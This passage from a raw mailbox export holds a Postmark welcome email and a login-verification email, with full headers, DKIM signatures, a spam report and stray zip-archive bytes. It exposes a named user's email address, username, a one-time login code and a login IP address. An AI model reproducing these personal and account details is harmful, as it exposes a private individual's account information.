--mk3-70a2fcdebbdc446fa8f28c0df4201132 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.= w3.org/TR/html4/loose.dtd"> <html lang=3D"en" style=3D"color-scheme: light dark; supported-color-scheme= s: light dark;"> <head> <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D= 1.0"> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8"> <meta name=3D"x-apple-disable-message-reformatting"> <meta name=3D"color-scheme" content=3D"light dark"> <meta name=3D"supported-color-schemes" content=3D"light dark"> =20 =20 <style>.ExternalClass { width: 100%; } .ExternalClass { line-height: 100%; } body { width: 100% !important; height: 100%; margin: 0; background-color: #eeece4;= color: #272727; line-height: 1.6; -webkit-text-size-adjust: none; } a:visited { color: #007bc8; text-decoration: underline; } a:visited img { border: none; } .btn:visited { border-color: #007bc8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #007bc8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #fff; font-weight: 700; text-align: center; text= -decoration: none; -webkit-text-size-adjust: none; } .btn:visited--s { border-width: 5px 9px; } .btn--ghost:visited { border-color: #deeef8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #deeef8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #007bc8; text-align: center; text-decoration: no= ne; -webkit-text-size-adjust: none; } .footer--slim a:visited { color: #b0aea7; } .follow-banner a:visited { color: #272727; } .digest a:hover { color: #000 !important; } @media screen and (prefers-color-scheme:dark) { body { background-color: #111 !important; } .spacer { background-color: #272727 !important; color: transparent !important; } .txt-warning { color: #fa9552 !important; } .txt-danger { color: #fb9186 !important; } .email-wrapper { background-color: #111 !important; } .btn { color: #ececec !important; } .btn:visited { color: #ececec !important; } h1 { color: #fff !important; } h2 { color: #fff !important; } h3 { color: #fff !important; } li { color: #ececec !important; } ol { color: #ececec !important; } p { color: #ececec !important; } ul { color: #ececec !important; } .one-time-code { color: #fff !important; } .welcome { background-color: #272727 !important; } .divider_line { border-color: #5a5a5a !important; } .divider { background-color: #272727 !important; } .purchase { border-color: #5a5a5a !important; } .purchase td { border-color: #5a5a5a !important; } .cta-banner--dmarcdigests { border-top-color: #5a5a5a !important; } .cta-banner { background-color: #272727 !important; } .footer { background-color: #111 !important; } .footer--slim p { color: #5a5a5a !important; } .footer--slim a { color: #5a5a5a !important; } .footer--slim a:visited { color: #5a5a5a !important; } .follow-banner { filter: brightness(.9) !important; } .header--filled { filter: brightness(.9) !important; } .header--error { background-color: #ffb3aa !important; } .header--digest { border-bottom-color: #5a5a5a !important; background-color: #272727 !imp= ortant; } .header--digest .header_logo img { filter: invert(1) !important; } .panel--warning { border-color: #847450 !important; background: #34311a !important; } .panel--warning .panel_body { color: #ffd6ba !important; } .panel--error { border-color: #483737 !important; background-color: #2e2222 !important; } .panel--success { border-color: #3d5332 !important; background-color: #2d302c !important; } .panel--info { border-color: #2c3d46 !important; background-color: #131d23 !important; } .panel_title { color: #ececec !important; } .digest-server { color: #ececec !important; } .digest-summary { background-color: #272727 !important; } .digest-summary--border { border-top-color: #5a5a5a !important; } .digest-summary_item { border-right-color: #5a5a5a !important; } .digest-section { background-color: #272727 !important; } .digest-key_label .activity-link { color: #ececec !important; } .hero { filter: brightness(.9) !important; } } @media screen and (max-width:599px) { pre { width: 230px; } .email-top { display: none !important; } .email-body_inner { width: 100% !important; } .email-footer { width: 100% !important; } .welcome { padding: 30px 30px 10px !important; } .divider { padding: 20px 30px !important; } .divider_image--desktop { display: none; } .divider_image--mobile { display: block !important; height: auto !important; max-height: none !i= mportant; font-size: 16px !important; } .divider--thick { padding: 20px 0 !important; } .divider--no-padding { padding-top: 0 !important; } .divider--no-pad-bottom { padding-bottom: 0 !important; } .divider--no-padding { padding-bottom: 0 !important; } .content-block { padding: 20px 30px !important; } .content-block--image { padding-top: 0 !important; padding-bottom: 0 !important; } .content-block_image-container { text-align: center; } .content-block_body-container { width: 100%; } .content-block_image-container { width: 100%; } .content-block--small .content-block_title { margin-top: 16px !important; } .cta-banner { padding: 30px; } .cta-banner_logo { text-align: center !important; } .cta-banner_sub-title { text-align: center !important; } .cta-banner_title { text-align: center !important; } .cta-banner_action { width: 100%; } .cta-banner_body { width: 100%; } .cta-banner_action { text-align: center !important; } .cta-banner_action td { text-align: center !important; } .cta-banner--centered .cta-banner_action td { text-align: center; } .footer { padding: 0 30px !important; } .footer_table { width: 100%; } .footer--slim { padding: 16px 30px !important; } .follow-banner { padding: 15px 30px !important; } .follow-banner_links { width: 100%; text-align: center !important; } .follow-banner_logo { width: 100%; text-align: center !important; } .follow-banner_logo { margin-bottom: 20px; } .follow-banner_links td { text-align: center !important; } .follow-banner_logo td { text-align: center !important; } .follow-banner_links span { display: block; } .header--digest .header_logo { padding-top: 0 !important; padding-bottom: 12px; text-align: center !im= portant; } .header_block { width: 100% !important; } .panel--inline .panel_col { width: 100% !important; } .panel--inline .panel_actions .btn { display: block !important; margin-top: 10px; } .digest-server { text-align: center !important; } .digest-date { text-align: center !important; } .digest-summary { padding-right: 30px !important; padding-left: 30px !important; } .digest-summary_item { width: 100% !important; border-right: 0 !important; padding-bottom: 20p= x !important; } .digest-summary_item td { padding-right: 0 !important; padding-bottom: 20px !important; padding-l= eft: 0 !important; } .digest-summary_item:last-child td { padding-bottom: 0 !important; } .digest-section { padding-right: 30px !important; padding-left: 30px !important; } .digest-key_item { width: 100% !important; } .digest-section-header_title { width: 100%; } .digest-section-header_actions { width: 100%; text-align: left !important; } .hero { padding: 10px 30px 0 !important; } } @media only screen and (max-device-width:480px) { body { -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } } </style> </head> <body class=3D"postmark" style=3D"width: 100% !important; height: 100%; b= ackground-color: #eeece4; color: #272727; line-height: 1.6; -webkit-text-si= ze-adjust: none; margin: 0;"> =20 <table class=3D"email-wrapper" width=3D"100%" cellpadding=3D"0" cellspa= cing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; mso-tab= le-rspace: 0; -premailer-width: 100%; width: 100%; -premailer-cellpadding: = 0; -premailer-cellspacing: 0; background-color: #eeece4; margin: 0; padding= : 0;"> <tr> <td align=3D"center" style=3D"font-family: Helvetica Neue,Helvetica= ,Arial,sans-serif;"> <table class=3D"email-content" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; m= so-table-rspace: 0; width: 100%; margin: 0; padding: 0;"> <tr> <td class=3D"email-top" width=3D"100%" cellpadding=3D"5" cell= spacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-ser= if; padding: 20px 0;"> <table class=3D"email-top_inner" align=3D"center" width=3D"= 600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse= ; mso-table-lspace: 0; mso-table-rspace: 0;"> <tr><td class=3D"email-top_content" style=3D"font-family:= Helvetica Neue,Helvetica,Arial,sans-serif; font-size: 12px; color: #b0aea7= ; text-align: center;"></td></tr> </table> </td> </tr> <tr> <td class=3D"email-body" width=3D"100%" cellpadding=3D"0" cel= lspacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-se= rif;"> <table class=3D"email-body_inner" align=3D"center" width=3D= "600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collaps= e; mso-table-lspace: 0; mso-table-rspace: 0; width: 600px; background-color= : #fff;"> <tr> <td class=3D"header header--filled" style=3D"font-family: Helvetica Neue,= Helvetica,Arial,sans-serif; background-color: #ffde00; text-align: center; = padding: 30px 0;"> <a href=3D"https://postmarkapp.com" style=3D"font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; color: #007bc8; text-decoration: underline;"> <img label=3D"Logo" src=3D"https://newsletter.postmarkapp.com/assets/= images/pm_logo@2x.png" width=3D"200" alt=3D"ActiveCampaign Postmark" style=3D= "margin-left: -27px; vertical-align: middle; border-style: none;"> </a> </td> </tr> <tr> <td class=3D"hero" style=3D"font-family: Helvetica Neue,Helvetica,Arial,s= ans-serif; background-color: #ffde00; font-size: 0; text-align: center; pad= ding: 0 50px;"> =20 <img alt=3D"Welcome to Postmark" width=3D"100%" src=3D"https://assets.pos= tmarkapp.com/packs/images/emails/hero/welcome@2x-961ee256.png"> </td> </tr> <tr> <td class=3D"welcome" style=3D"font-family: Helvetica Neue,Helvetica,Aria= l,sans-serif; background-color: #fff; padding: 50px 50px 20px;"> =20 <p class=3D"welcome_greeting" style=3D"font-family: Helvetica Neue,Helvet= ica,Arial,sans-serif; line-height: 22px; text-align: left; margin-top: 0; f= ont-size: 21px; margin-bottom: 25px; color: #404040; font-weight: 700;">Wel= come Rudolph.Perry =F0=9F=91=8B</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">You=E2=80=99re in! We=E2=80=99re writing to let = you know that Andr=C3=A9s manually reviewed and approved your account and y= ou can now start sending email from your app to any email address.</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">As a reminder, your username is <strong style=3D= "font-family: Helvetica Neue,Helvetica,Arial,sans-serif;">Rudolph.Perry</st= rong>. You can <a href=3D"http://account.postmarkapp.com/login" target=3D"_= blank" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; col= or: #007bc8; text-decoration: underline;">log into your account here</a>.</= p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">Thanks for your patience during this process. We= manually review every new account to help us maintain the highest possible= reliability and deliverability rates for all of our customers.</p> <div class=3D"panel panel--info panel--l" style=3D"margin-bottom: 30px; b= order-radius: 4px; background-color: #f5fafd; text-align: center; padding: = 25px; border: 1px solid #deeef8;"> <h3 class=3D"panel_title" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; color: #272727; font-weight: 700; font-size: 18px; text= -align: left; margin: 0 0 .6em;">You=E2=80=99re on the free developer plan<= /h3> <div class=3D"panel_body" style=3D"color: #5a5a5a; text-align: left; ma= rgin: 0;"> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; l= ine-height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-= bottom: 25px; color: #404040;">We=E2=80=99ve started you off on the free de= veloper plan (100 test emails per month). Feel free to upgrade when you=E2=80= =99re ready to increase your monthly email limit.</p> </div> <p style=3D"margin-top: .5em; margin-bottom: 0; padding-bottom: 0; font= -family: Helvetica Neue,Helvetica,Arial,sans-serif; line-height: 22px; text= -align: left; font-size: 14px; color: #404040;"><a href=3D"https://account.= postmarkapp.com/subscription" class=3D"btn" style=3D"font-family: Helvetica= Neue,Helvetica,Arial,sans-serif; color: #fff; text-decoration: none; backg= round-color: #007bc8; font-size: 14px; display: inline-block; height: auto;= border-radius: 3px; font-weight: 700; text-align: center; -webkit-text-siz= e-adjust: none; border-color: #007bc8; border-style: solid; border-width: 1= 0px 18px;">Upgrade your plan</a></p> </div> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; font-size: 14px; color: #404040; margin: 0;= padding: 0;">Now that you=E2=80=99re part of the Postmark family, there ar= e a few things you can expect from us:</p> <ul style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line= -height: 1.6; text-align: left; font-size: 14px; color: #404040;"> <li class=3D"u-font-size-m" style=3D"margin-bottom: .4em; font-size: 14= px; font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-height: 1.= 6; text-align: left; color: #404040;">First and foremost, you can expect yo= ur emails to be delivered quickly to your customers=E2=80=99 inboxes. That = is why we exist, and we=E2=80=99ll never lose sight of that.</li> <li class=3D"u-font-size-m" style=3D"margin-bottom: .4em; font-size: 14= px; font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-height: 1.= 6; text-align: left; color: #404040;">You can also expect clear and accurat= e documentation, a straightforward UI, and helpful support from friendly hu= mans who know what they=E2=80=99re talking about (and who want to see your = business thrive as much as you do).</li> </ul> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">If you have any questions as you get set up, jus= t reply and we=E2=80=99ll do everything we can to help you along. Also be s= ure to check out our <a href=3D"https://postmarkapp.com/manual" style=3D"fo= nt-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #007bc8; text-= decoration: underline;">step-by-step guide</a> on how to implement Postmark= in the way that=E2=80=99s best for your app.</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">Seriously, though =E2=80=94 welcome. We=E2=80=99= re really happy you=E2=80=99re with us.</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"><strong style=3D"font-family: Helvetica Neue,Hel= vetica,Arial,sans-serif;">The Postmark Team</strong></p> </td> </tr> <tr> <td class=3D"follow-banner" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; background-color: #ffde00; padding: 15px 50px;"> <table class=3D"follow-banner_links" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" align=3D"right" valign=3D"middle" style=3D"border-collapse= : collapse; mso-table-lspace: 0; mso-table-rspace: 0; font-size: 14px; text= -align: center;"> <tr> <td class=3D"align-center" style=3D"font-family: Helvetica Neue,Hel= vetica,Arial,sans-serif; text-align: center;"> <span>Follow us on</span> <img src=3D"https://newsletter.postmark= app.com/assets/images/twitter-dark@2x.png" alt=3D"Twitter Logo" width=3D"18= " height=3D"15" style=3D"margin-bottom: -3px;"> <a href=3D"https://twitter.= com/postmarkapp" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-= serif; color: #272727; text-decoration: underline;">Twitter</a> and <img sr= c=3D"https://newsletter.postmarkapp.com/assets/images/linkedin-dark@2x.png"= alt=3D"LinekdIn Logo" width=3D"15" height=3D"15" style=3D"margin-bottom: -= 3px;"> <a href=3D"https://www.linkedin.com/company/postmarkapp" style=3D"fo= nt-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #272727; text-= decoration: underline;">LinkedIn</a> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer" style=3D"font-family: Helvetica Neue,Helvetica,Arial= ,sans-serif; font-size: 14px; background-color: #3b4049; color: #fff; paddi= ng: 0 50px;"> <p style=3D"color: #FFF; text-align: center; font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; line-height: 22px; font-size: 14px; margin: 1= 2px 0;">=F0=9F=92=8C <a href=3D"https://postmarkapp.com/newsletter" style=3D"color: rgba(2= 55, 255,255, .5); font-family: Helvetica Neue,Helvetica,Arial,sans-serif; t= ext-decoration: underline;">Subscribe to the Postmark newsletter</a> </p> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer footer--slim" style=3D"font-family: Helve= tica Neue,Helvetica,Arial,sans-serif; font-size: 14px; background-color: #e= eece4; color: #fff; border-top-width: 0; padding: 16px 50px;"> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,san= s-serif; line-height: 22px; text-align: center; font-size: 14px; color: #b0= aea7; margin: 0;"><a href=3D"https://www.activecampaign.com/?utm_source=3Dp= ostmark&utm_medium=3Demail" target=3D"_blank" style=3D"font-family: Hel= vetica Neue,Helvetica,Arial,sans-serif; color: #b0aea7; text-decoration: un= derline;">ActiveCampaign</a> LLC, 1 North Dearborn St, 5th Floor, Chicago, = IL 60602</p> </td> </tr> </table> </td> </tr> </table> </body> </html> --mk3-70a2fcdebbdc446fa8f28c0df4201132-- PK }��YL��Ѥ] �] C 1727260047.M497910P1611640.mgh-web11.maghost.ro,S=23972,W=24663:2,Snu ��٘� Return-Path: <pm_bounces@pmbounces.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id IlacHI/l82Z4lxgAJwI5NA (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Wed, 25 Sep 2024 13:27:27 +0300 Return-path: <pm_bounces@pmbounces.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Wed, 25 Sep 2024 13:27:27 +0300 Received: from sc-ord-mta124.mtasv.net ([50.31.156.124]:36706) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) id 1stPF2-00000006lDd-2GOx for rudolph.perry@bloomingcostamices.com; Wed, 25 Sep 2024 13:27:27 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=pm20231108; d=pm.mtasv.net; h=From:Date:Subject:To:Message-Id:MIME-Version:Content-Type:Date:From: Message-ID:Reply-To:Sender:Subject:To:CC; t=1727260046; x=1727346446; bh=99MscsZKpApB+TFxV/jHotKrSWoC75gTXObBv6LSu1A=; b=JQx+DZ/SekJTN1FwwFD3rOaAuQxHEFEfjgee7zZ7hRd10PT9DpayLn30oRjNqnHkmHLMl3HKkwQi cQXyHmjttlyDw116UqM4xao2CLu4N8LjEpa7TcxfaS6gVBUHFzJW2UB9v5x7ePnzalRefrImD4tT SXGbgdVbkMYgxr5Uezs= Received: by sc-ord-mta124.mtasv.net id hufim83864ot for <rudolph.perry@bloomingcostamices.com>; Wed, 25 Sep 2024 06:26:43 -0400 (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) X-PM-IP: 50.31.156.124 X-IADB-IP: 50.31.156.124 X-IADB-IP-REVERSE: 124.156.31.50 DKIM-Signature: v=1; a=rsa-sha256; d=postmarkapp.com; s=20240110170422pm; c=relaxed/relaxed; i=support@postmarkapp.com; t=1727260003; x=1727432803; h=date:date:from:from:message-id:reply-to:sender:subject:subject:to:to:cc: feedback-id:mime-version:content-type; bh=99MscsZKpApB+TFxV/jHotKrSWoC75gTXObBv6LSu1A=; b=C8L0zwBToB06HJsbnmO+ZPveWPrMxex/Ui332Ah7fK5HqluoEHGTF/x58LmH+MRlVRdAm7dhkIa SvllzcrMbDiG/ns0MQWRhwlwyVTDZVNtMqNfInsrjWTC9ishYJK2+XIx6IjhCiIgDHKyybPwPZWST CmfW8/8GJjc3PSPwcmI= From: Postmark <support@postmarkapp.com> Date: Wed, 25 Sep 2024 10:26:43 +0000 Subject: Your Postmark verification code is 409949 To: rudolph.perry@bloomingcostamices.com Message-Id: <66f3e5639028a_1ba320a58568a7@ip-172-26-11-240.us-east-2.compute.internal.mail> Feedback-ID: s40483-bG9naW4tdmVyaWZpY2F0aW9uLWNvZGU=:s40483:a50355:postmark X-Complaints-To: abuse@postmarkapp.com X-PM-Message-Id: 2d453a55-cc70-446f-8d29-d280ffbb80e1 X-PM-Tag: login-verification-code X-PM-RCPT: |bTB8NTAzNTV8NDA0ODN8cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29t| X-PM-Message-Options: v1;1.QEPz4Vxzg3DrS9NH-xSM4Q.N4D-3VmwVVKbsy5lCU50bEjrQGrdNJHW45GdUIoZxf0mH4f_a8RLa-cgnU-DJjHkMtLXR2pTFISg_8Lpk_KOFcW1knpbhU_4rObyodnPPezCekibhMARRS7vYGZ3SPnSyWNVh3Rbmk0_RCwFGkJL1LWmP40xJctduPUtsl9Y-A3T9q6WCDyXNLrdruapqNNPf7yzLiRaIzIrma6d6tgTKw MIME-Version: 1.0 X-PM-MTA-Pool: transactional-1 Content-Type: multipart/alternative; boundary=mk3-fd03bba5f0704f6d94571cbcd77bfe9d; charset=UTF-8 X-Spam-Status: No, score=0.3 X-Spam-Score: 3 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Hi Rudolph.Perry, We noticed someone just tried to log in to your Postmark account. If this was you, please use the following code to confirm it: 409949 Content analysis details: (0.3 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_PASS SPF: sender matches SPF record -0.0 SPF_HELO_PASS SPF: HELO matches SPF record 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.0 HTML_MESSAGE BODY: HTML included in message 0.5 KAM_NUMSUBJECT Subject ends in numbers excluding current years -0.1 DKIMWL_WL_HIGH DKIMwl.org - High trust sender X-Spam-Flag: NO --mk3-fd03bba5f0704f6d94571cbcd77bfe9d Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Hi Rudolph.Perry, We noticed someone just tried to log in to your Postmark account. If this w= as you, please use the following code to confirm it: 409949 This code is valid for 10 minutes. LOGIN DETAILS: * Time: 2024-09-25 12:26:43 +0200 * IP: 27.59.79.141 --- DON=E2=80=99T RECOGNIZE THIS ACTIVITY? If you didn=E2=80=99t initiate the login above, please change your password= immediately: https://account.postmarkapp.com/password_resets/new Turn on two-factor authentication on your account: https://postmarkapp.com/support/article/1081-how-do-i-use-two-factor-authen= tication-2fa If you need any help, just reply to this email. Postmark Team https://postmarkapp.com/support Follow us for the latest updates: http://twitter.com/postmarkapp --mk3-fd03bba5f0704f6d94571cbcd77bfe9d Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.= w3.org/TR/html4/loose.dtd"> <html lang=3D"en" style=3D"color-scheme: light dark; supported-color-scheme= s: light dark;"> <head> <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D= 1.0"> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8"> <meta name=3D"x-apple-disable-message-reformatting"> <meta name=3D"color-scheme" content=3D"light dark"> <meta name=3D"supported-color-schemes" content=3D"light dark"> =20 =20 <style>.ExternalClass { width: 100%; } .ExternalClass { line-height: 100%; } body { width: 100% !important; height: 100%; margin: 0; background-color: #eeece4;= color: #272727; line-height: 1.6; -webkit-text-size-adjust: none; } a:visited { color: #007bc8; text-decoration: underline; } a:visited img { border: none; } .btn:visited { border-color: #007bc8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #007bc8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #fff; font-weight: 700; text-align: center; text= -decoration: none; -webkit-text-size-adjust: none; } .btn:visited--s { border-width: 5px 9px; } .btn--ghost:visited { border-color: #deeef8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #deeef8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #007bc8; text-align: center; text-decoration: no= ne; -webkit-text-size-adjust: none; } .footer--slim a:visited { color: #b0aea7; } .follow-banner a:visited { color: #272727; } .digest a:hover { color: #000 !important; } @media screen and (prefers-color-scheme:dark) { body { background-color: #111 !important; } .spacer { background-color: #272727 !important; color: transparent !important; } .txt-warning { color: #fa9552 !important; } .txt-danger { color: #fb9186 !important; } .email-wrapper { background-color: #111 !important; } .btn { color: #ececec !important; } .btn:visited { color: #ececec !important; } h1 { color: #fff !important; } h2 { color: #fff !important; } h3 { color: #fff !important; } li { color: #ececec !important; } ol { color: #ececec !important; } p { color: #ececec !important; } ul { color: #ececec !important; } .one-time-code { color: #fff !important; } .welcome { background-color: #272727 !important; } .divider_line { border-color: #5a5a5a !important; } .divider { background-color: #272727 !important; } .purchase { border-color: #5a5a5a !important; } .purchase td { border-color: #5a5a5a !important; } .cta-banner--dmarcdigests { border-top-color: #5a5a5a !important; } .cta-banner { background-color: #272727 !important; } .footer { background-color: #111 !important; } .footer--slim p { color: #5a5a5a !important; } .footer--slim a { color: #5a5a5a !important; } .footer--slim a:visited { color: #5a5a5a !important; } .follow-banner { filter: brightness(.9) !important; } .header--filled { filter: brightness(.9) !important; } .header--error { background-color: #ffb3aa !important; } .header--digest { border-bottom-color: #5a5a5a !important; background-color: #272727 !imp= ortant; } .header--digest .header_logo img { filter: invert(1) !important; } .panel--warning { border-color: #847450 !important; background: #34311a !important; } .panel--warning .panel_body { color: #ffd6ba !important; } .panel--error { border-color: #483737 !important; background-color: #2e2222 !important; } .panel--success { border-color: #3d5332 !important; background-color: #2d302c !important; } .panel--info { border-color: #2c3d46 !important; background-color: #131d23 !important; } .panel_title { color: #ececec !important; } .digest-server { color: #ececec !important; } .digest-summary { background-color: #272727 !important; } .digest-summary--border { border-top-color: #5a5a5a !important; } .digest-summary_item { border-right-color: #5a5a5a !important; } .digest-section { background-color: #272727 !important; } .digest-key_label .activity-link { color: #ececec !important; } .hero { filter: brightness(.9) !important; } } @media screen and (max-width:599px) { pre { width: 230px; } .email-top { display: none !important; } .email-body_inner { width: 100% !important; } .email-footer { width: 100% !important; } .welcome { padding: 30px 30px 10px !important; } .divider { padding: 20px 30px !important; } .divider_image--desktop { display: none; } .divider_image--mobile { display: block !important; height: auto !important; max-height: none !i= mportant; font-size: 16px !important; } .divider--thick { padding: 20px 0 !important; } .divider--no-padding { padding-top: 0 !important; } .divider--no-pad-bottom { padding-bottom: 0 !important; } .divider--no-padding { padding-bottom: 0 !important; } .content-block { padding: 20px 30px !important; } .content-block--image { padding-top: 0 !important; padding-bottom: 0 !important; } .content-block_image-container { text-align: center; } .content-block_body-container { width: 100%; } .content-block_image-container { width: 100%; } .content-block--small .content-block_title { margin-top: 16px !important; } .cta-banner { padding: 30px; } .cta-banner_logo { text-align: center !important; } .cta-banner_sub-title { text-align: center !important; } .cta-banner_title { text-align: center !important; } .cta-banner_action { width: 100%; } .cta-banner_body { width: 100%; } .cta-banner_action { text-align: center !important; } .cta-banner_action td { text-align: center !important; } .cta-banner--centered .cta-banner_action td { text-align: center; } .footer { padding: 0 30px !important; } .footer_table { width: 100%; } .footer--slim { padding: 16px 30px !important; } .follow-banner { padding: 15px 30px !important; } .follow-banner_links { width: 100%; text-align: center !important; } .follow-banner_logo { width: 100%; text-align: center !important; } .follow-banner_logo { margin-bottom: 20px; } .follow-banner_links td { text-align: center !important; } .follow-banner_logo td { text-align: center !important; } .follow-banner_links span { display: block; } .header--digest .header_logo { padding-top: 0 !important; padding-bottom: 12px; text-align: center !im= portant; } .header_block { width: 100% !important; } .panel--inline .panel_col { width: 100% !important; } .panel--inline .panel_actions .btn { display: block !important; margin-top: 10px; } .digest-server { text-align: center !important; } .digest-date { text-align: center !important; } .digest-summary { padding-right: 30px !important; padding-left: 30px !important; } .digest-summary_item { width: 100% !important; border-right: 0 !important; padding-bottom: 20p= x !important; } .digest-summary_item td { padding-right: 0 !important; padding-bottom: 20px !important; padding-l= eft: 0 !important; } .digest-summary_item:last-child td { padding-bottom: 0 !important; } .digest-section { padding-right: 30px !important; padding-left: 30px !important; } .digest-key_item { width: 100% !important; } .digest-section-header_title { width: 100%; } .digest-section-header_actions { width: 100%; text-align: left !important; } .hero { padding: 10px 30px 0 !important; } } @media only screen and (max-device-width:480px) { body { -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } } </style> </head> <body class=3D"postmark" style=3D"width: 100% !important; height: 100%; b= ackground-color: #eeece4; color: #272727; line-height: 1.6; -webkit-text-si= ze-adjust: none; margin: 0;"> <span class=3D"preheader" style=3D"display: none !important; max-width:= 0; max-height: 0; overflow: hidden; visibility: hidden; opacity: 0; font-s= ize: 1px; line-height: 1px; mso-hide: all;">Someone just tried to access yo= ur Postmark account and we want to make sure it=E2=80=99s you.</span> <table class=3D"email-wrapper" width=3D"100%" cellpadding=3D"0" cellspa= cing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; mso-tab= le-rspace: 0; -premailer-width: 100%; width: 100%; -premailer-cellpadding: = 0; -premailer-cellspacing: 0; background-color: #eeece4; margin: 0; padding= : 0;"> <tr> <td align=3D"center" style=3D"font-family: Helvetica Neue,Helvetica= ,Arial,sans-serif;"> <table class=3D"email-content" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; m= so-table-rspace: 0; width: 100%; margin: 0; padding: 0;"> <tr> <td class=3D"email-top" width=3D"100%" cellpadding=3D"5" cell= spacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-ser= if; padding: 20px 0;"> <table class=3D"email-top_inner" align=3D"center" width=3D"= 600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse= ; mso-table-lspace: 0; mso-table-rspace: 0;"> <tr><td class=3D"email-top_content" style=3D"font-family:= Helvetica Neue,Helvetica,Arial,sans-serif; font-size: 12px; color: #b0aea7= ; text-align: center;"></td></tr> </table> </td> </tr> <tr> <td class=3D"email-body" width=3D"100%" cellpadding=3D"0" cel= lspacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-se= rif;"> <table class=3D"email-body_inner" align=3D"center" width=3D= "600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collaps= e; mso-table-lspace: 0; mso-table-rspace: 0; width: 600px; background-color= : #fff;"> <tr> <td class=3D"header header--filled" style=3D"font-family: Helvetica Neue,= Helvetica,Arial,sans-serif; background-color: #ffde00; text-align: center; = padding: 30px 0;"> <a 